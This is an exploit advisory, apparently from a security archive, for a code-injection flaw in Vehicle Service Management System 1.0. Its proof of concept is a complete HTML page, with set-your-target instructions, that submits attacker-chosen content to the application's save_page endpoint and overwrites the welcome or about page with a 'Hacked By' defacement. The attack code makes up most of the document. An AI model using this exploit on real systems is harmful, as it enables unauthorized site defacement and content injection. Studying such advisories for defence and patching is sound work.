Vehicle Service Management System 1.0 WYSIWYG Code Injection

=============================================================================================================================================
| # Title : Vehicle Service Management System 1.0 WYSIWYG code injection vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |
| # Vendor : https://www.kashipara.com/project/php/10641/online-vehicle-service-management-system |
=============================================================================================================================================

poc :

[+] This payload injects code of your choice into the welcome page or about via TinyMCE is a WYSIWYG editor V: 7.3.0 which is called inside the file /php-spms/classes/Master.php .

[+] Line 86 : Set your Target.

[+] Line 27 : set your payload. <textarea name=”page[welcome] ===> You can type welcome or about.

[+] save payload as poc.html

[+] payload :

<!DOCTYPE html>
<html lang=”en”>
<head>
<meta charset=”UTF-8″>
<meta name=”viewport” content=”width=device-width, initial-scale=1.0″>
<title>Welcome Page Editor</title>
<script src=”https://cdn.tiny.cloud/1/dsrqgwhljvccmtuu414smiyefdarsp88j5fxk0uks60iek04/tinymce/7/tinymce.min.js” referrerpolicy=”origin”></script>
</head>
<body>
<main id=”main” class=”main”>
<div class=”pagetitle”>
<h1>Welcome Page</h1>
<nav>
<ol class=”breadcrumb”>

<li class=”breadcrumb-item active”>Welcome Page</li>
</ol>
</nav>
</div>

<div id=”msg-container”></div>

<div class=”card rounded-0″>
<div class=”card-body rounded-0 pt-4″>
<div class=”container-fluid”>
<form id=”page-form”>
<textarea name=”page[welcome]” cols=”30″ rows=”10″ class=”form-control tinymce-editor” required>Hacked By indoushka ;</textarea>
</form>
</div>
</div>
<div class=”card-footer”>
<div class=”col-lg-4 col-md-5 col-sm-10 col-12 mx-auto”>
<button class=”btn btn-block w-100 btn-primary” form=”page-form”>Update</button>
</div>
</div>
</div>

<div id=”loader” style=”display:none;”>Loading…</div>
<div id=”toast”></div>

<script>
// Initialize TinyMCE
tinymce.init({
selector: ‘textarea.tinymce-editor’,
height: 300,
menubar: false,
plugins: [
‘advlist autolink lists link image charmap print preview anchor’,
‘searchreplace visualblocks code fullscreen’,
‘insertdatetime media table paste code help wordcount’
],
toolbar: ‘undo redo | formatselect | bold italic backcolor | ‘ +
‘alignleft aligncenter alignright alignjustify | ‘ +
‘bullist numlist outdent indent | removeformat | help’
});

// Loader functions
function start_loader() {
document.getElementById(‘loader’).style.display = ‘block’;
}

function end_loader() {
document.getElementById(‘loader’).style.display = ‘none’;
}

// Toast function
function showMessage(message, type) {
const messageDiv = document.getElementById(‘toast’);
messageDiv.innerHTML = `<div class=”alert alert-${type}”>${message}</div>`;
setTimeout(() => {
messageDiv.innerHTML = ”;
}, 3000);
}

// Form submit event listener
document.getElementById(‘page-form’).addEventListener(‘submit’, function(e) {
e.preventDefault(); // Prevent page reload

// Start loader
start_loader();

const formData = new FormData(this); // Get form data
const xhr = new XMLHttpRequest(); // Create new XMLHttpRequest object

// Set up request
xhr.open(‘POST’, ‘http://localhost/vservice/classes/Master.php?f=save_page’, true);

// Handle response
xhr.onreadystatechange = function() {
if (xhr.readyState === XMLHttpRequest.DONE) {
end_loader();
if (xhr.status === 200) {
const response = JSON.parse(xhr.responseText);
if (response.status === ‘success’) {
showMessage(‘Page updated successfully!’, ‘success’);
location.reload(); // Reload the page if successful
} else if (response.status === ‘failed’ && response.msg) {
showMessage(response.msg, ‘error’);
} else {
showMessage(‘An unknown error occurred.’, ‘error’);
}
} else {
showMessage(‘Error: ‘ + xhr.statusText, ‘error’);
}
}
};

// Send the request
xhr.send(formData);
});
</script>
</main>
</body>
</html>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

نوشته های مشابه

Android qrtr_bpf_filter_detach Double-Free / Use-After-Free

fastrpc_mmap_find Information Leak

ManageEngine ADManager 7183 Password Hash Disclosure

Transport Management System 1.0 Code Injection